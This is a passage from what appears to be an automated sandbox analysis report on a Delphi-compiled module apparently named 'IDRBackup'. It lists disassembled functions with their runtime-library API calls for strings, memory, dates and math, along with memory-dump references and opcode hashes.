                                                                                                  • Instruction Fuzzy Hash: 81A114314093C0AFC706CB609E66959BFB9FF5321071982DAD5808F173D3359AB6D7A2
                                                                                                  Function 5000C120 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@GetMem$qqri.RTL120(?), ref: 5000C1A5
                                                                                                  • @System@@FillChar$qqrpvib.RTL120(?), ref: 5000C1D5
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?), ref: 5000C1F5
                                                                                                  • @System@DynArrayClear$qqrrpvpv.RTL120 ref: 5000C200
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@$ArrayChar$qqrpvibClear$qqrrpvpvFillMem$qqriMove$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 3421884137-0
                                                                                                  • Opcode ID: d72ef6b357c912858527ba27ee4b5402b2d8ef4a25db6a3fc010ba388ca52663
                                                                                                  • Instruction ID: 5db1012356cac20667bbd3f12f650a3e6fe453fe90b972ea62dd2f95c9d85502
                                                                                                  • Opcode Fuzzy Hash: d72ef6b357c912858527ba27ee4b5402b2d8ef4a25db6a3fc010ba388ca52663
                                                                                                  • Instruction Fuzzy Hash: 3B312D71E002599FDB14DF98CCA0ADEF7F1FF49220B518266E819EB352D7709E018B90
                                                                                                  Function 50025A30 Relevance: 6.1, APIs: 4, Instructions: 87timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 50024D00: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50025040), ref: 50024D80
                                                                                                    • Part of subcall function 50024D00: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50025040), ref: 50024D8B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50025B12), ref: 50025A96
                                                                                                  • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTimerx24Sysutils@TFormatSettings.RTL120(?,00000000,50025B12), ref: 50025ACA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$Sysutils@$StringSystem@@$AnsiCopy$qqrx20DateFormatFromInternalSettingsStr$qqrr20StringiiStringr16Stringx27System@%T$us$i0$%Time$qqrx20Timerx24Trim$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2292931001-0
                                                                                                  • Opcode ID: 84447efb2cb3415f8d16ecc4577d258c5cf45c66936d73402ad984f0ee6a8cab
                                                                                                  • Instruction ID: d33868aacac2f56ee1de542acf73dd20ca58ab904041af6ac397144845128ccd
                                                                                                  • Opcode Fuzzy Hash: 84447efb2cb3415f8d16ecc4577d258c5cf45c66936d73402ad984f0ee6a8cab
                                                                                                  • Instruction Fuzzy Hash: 0C315E3090654EEFCF00DFA4E9928DDB7F6EF59301F6046A6E800A7250DB719E05DB99
                                                                                                  Function 50025948 Relevance: 6.1, APIs: 4, Instructions: 81timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 500248EC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                    • Part of subcall function 500248EC: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
                                                                                                    • Part of subcall function 500248EC: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50025A1C), ref: 500259AA
                                                                                                  • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTime.RTL120(00000000,50025A1C), ref: 500259DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Copy$qqrx20DateStringiiStringr16TimeTime$qqrx20Trim$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2689908369-0
                                                                                                  • Opcode ID: b0c36b5748d489f7461d89ea8bf913bcfd18d707684df885256712fd9f4fa0f3
                                                                                                  • Instruction ID: 93a382b7fa73da40bbc338623e28f744c92bd425220c80b90625fb34c49939c0
                                                                                                  • Opcode Fuzzy Hash: b0c36b5748d489f7461d89ea8bf913bcfd18d707684df885256712fd9f4fa0f3
                                                                                                  • Instruction Fuzzy Hash: E521D13091218ADBDF00DFA4E8829EDB7F6EF48311F6006A2D440E3200EB309E40DB89
                                                                                                  Function 50009B2C Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@NewWideString$qqri.RTL120 ref: 50009B82
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 50009B99
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 50009BA9
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 50009BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Move$qqrpxvpviSystem@$String$qqriSystem@@Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2978300780-0
                                                                                                  • Opcode ID: 9ed6245364869eda90bbe2cf8a72df44c5e7e2fe0a89643c11834f0be839a104
                                                                                                  • Instruction ID: 2cc34c0e70a3c0a200f551ea926f3f83d6c741b9e70e651da199dcfddd72ecd4
                                                                                                  • Opcode Fuzzy Hash: 9ed6245364869eda90bbe2cf8a72df44c5e7e2fe0a89643c11834f0be839a104
                                                                                                  • Instruction Fuzzy Hash: D3219D757046458FEB14DE6CE9E089EB3E5EB94220B844B3DE946C7361EA31EC048781
                                                                                                  Function 50024410 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500244C4), ref: 5002446D
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,500244C4), ref: 50024472
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$StringSystem@System@@$EnsureString$qqrr20$Len$qqrx20$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 3424071357-0
                                                                                                  • Opcode ID: 163a8ac3203b88bc679271fd277f8823215291bac1fd57a86e87f28860fdda50
                                                                                                  • Instruction ID: f3f28708e52072fea52f12d8c3f656ea0e7ad7d042a07a009517b6842a75c669
                                                                                                  • Opcode Fuzzy Hash: 163a8ac3203b88bc679271fd277f8823215291bac1fd57a86e87f28860fdda50
                                                                                                  • Instruction Fuzzy Hash: 90210531901185DFCB51EFA8D891ADDB7F4EF6A310F6042A2E844D3351E7309E10C791
                                                                                                  Function 50004D88 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,?,?,50004E31,00000064,50004D78,0000D7B1,?), ref: 50004DB9
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,?,?,00000000,?,?,?,?,?,50004E31,00000064,50004D78,0000D7B1,?), ref: 50004DBE
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,?,?,?,?,50004E31,00000064,50004D78,0000D7B1,?), ref: 50004E01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Res$qqriSystem@$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2047590429-0
                                                                                                  • Opcode ID: bf90b40dc3696541b7f9f48173c2ea52aa96084c887922c783e3276879b66828
                                                                                                  • Instruction ID: 1d09fb837ef9f7ea7c9092939effd6f02b5de1af5ec234eb996aed797f3fea0c
                                                                                                  • Opcode Fuzzy Hash: bf90b40dc3696541b7f9f48173c2ea52aa96084c887922c783e3276879b66828
                                                                                                  • Instruction Fuzzy Hash: 8C117BB1701148EFEB54DFA9D990A8EB7F8FF58210B504166FC08D7201D670EE00DBA4
                                                                                                  Function 50024634 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 5002467C
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 500246A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$StringSystem@System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$EnsureInternalString$qqrr20$Len$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 3299320216-0
                                                                                                  • Opcode ID: 063df37b82a887ee646a343d3283fa2db6b459733aeeaa70d7aed97fde92dc1c
                                                                                                  • Instruction ID: f889b8404583497afe00f4d2b022e65e4a04262e97f4224d3da720eb7ba1a7cf
                                                                                                  • Opcode Fuzzy Hash: 063df37b82a887ee646a343d3283fa2db6b459733aeeaa70d7aed97fde92dc1c
                                                                                                  • Instruction Fuzzy Hash: 8D11C630B0218ADFDB51DFA8E94589EB3F9EF963007A14276E940D3215E730EE01D791
                                                                                                  Function 50009DD8 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,?,?), ref: 50009E2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CharFromLen$qqrr20StringpbiSystem@System@@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 406827183-0
                                                                                                  • Opcode ID: 22200938a9484e9294c62d482b02979bb624ee311457ece1efcbe38d70eda6ce
                                                                                                  • Instruction ID: 323a259197dfde492381cdea6874772644c1dd76bd1dfbb1512cc1147d46b888
                                                                                                  • Opcode Fuzzy Hash: 22200938a9484e9294c62d482b02979bb624ee311457ece1efcbe38d70eda6ce
                                                                                                  • Instruction Fuzzy Hash: CB01C43170169A97EB10DAADD8E18DBB3DE9FA8210B944337BA49D3302DEB4DE0446D1
                                                                                                  Function 50013328 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Math@IsZero$qqrxgg.RTL120(00000000,00000000,00000000,?,?,?), ref: 5001333F
                                                                                                  • @Math@SameValue$qqrxgxgg.RTL120(00000000,00000000,00000000,00000000,80000000,00003FFF,?,?,?,00000000,00000000,00000000,?,?,?), ref: 50013379
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Math@$SameValue$qqrxgxggZero$qqrxgg
                                                                                                  • String ID:
                                                                                                  • API String ID: 2598474148-0
                                                                                                  • Opcode ID: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                  • Instruction ID: 8b6f4d4d102a9fe6760369e0e7593088a52b22f4b9c98d94c50d589b633ebce5
                                                                                                  • Opcode Fuzzy Hash: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                  • Instruction Fuzzy Hash: 28110D70E48245B6EF315FA08C027AE7FA0AF01A10F208B4BFEF4A51D1DA724260C789
                                                                                                  Function 500246E0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$StringSystem@System@@$AnsiEnsureFromInternalLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2906622797-0
                                                                                                  • Opcode ID: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                  • Instruction ID: a635cd3dcb40994497b53f8fe6e6c41f0fe1daa708a8bd6d2e43c945e9681864
                                                                                                  • Opcode Fuzzy Hash: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                  • Instruction Fuzzy Hash: AF01B13551F1D6AED7A1AFA0F8525EEB7E8EB13300BA106B6ED2082901D3649E00A251
                                                                                                  Function 5000D750 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D75A
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D766
                                                                                                    • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                    • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D7C6
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D7D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@Wide$ArrayLength$qqrr17Length$qqrvStringi$Move$qqrpxvpviString$qqri
                                                                                                  • String ID:
                                                                                                  • API String ID: 2943924986-0
                                                                                                  • Opcode ID: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                  • Instruction ID: 5542b4fa33d5804e65baac3af09d9e428f9e0197dd64d1a1656dc7895a855856
                                                                                                  • Opcode Fuzzy Hash: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                  • Instruction Fuzzy Hash: 4E01F9202149495FD3109F6DD8419ABB3E2EFE0311B40C23BF545C7229EAB49942C290
                                                                                                  Function 500098F4 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@NewWideString$qqri.RTL120 ref: 5000992F
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5000993E
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5000994E
                                                                                                  • @System@@WStrClr$qqrpv.RTL120 ref: 50009962
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  Memory Dump Source
